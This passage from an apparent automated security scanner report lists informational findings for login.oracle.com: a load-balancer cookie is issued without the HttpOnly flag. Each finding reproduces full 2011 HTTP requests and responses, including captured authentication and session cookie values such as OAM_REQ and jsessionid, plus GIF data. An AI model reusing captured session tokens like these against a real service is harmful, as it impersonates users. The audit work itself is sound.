RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 5959
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBR06uHK6EVADUS1EHWFB01t_bO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

//-- moc_lib.js: Core JS library for www.oracle.com
var ORA_UCM_INFO;


//-- Function Library

// to populate the user name -------------------------------------------------//
function PopulateLogin()
...[SNIP]...

13.100. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oracle-footer-tagline.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Accept-Ranges: bytes
Content-Length: 1711
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCTJ6uHK6EVADUS1EHWFB01t_dG
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

13.101. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oralogo_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 2059
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cB
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

13.102. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-l.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 304
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBnj6uHK6EVADUS1EHWFB01t_c6
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.................................................................ST................XY............................TV............................PQ.................................................
...[SNIP]...

13.103. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-m-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 154
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpw6uHK6EVADUS1EHWFB01t_cE
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;

13.104. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-r.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzm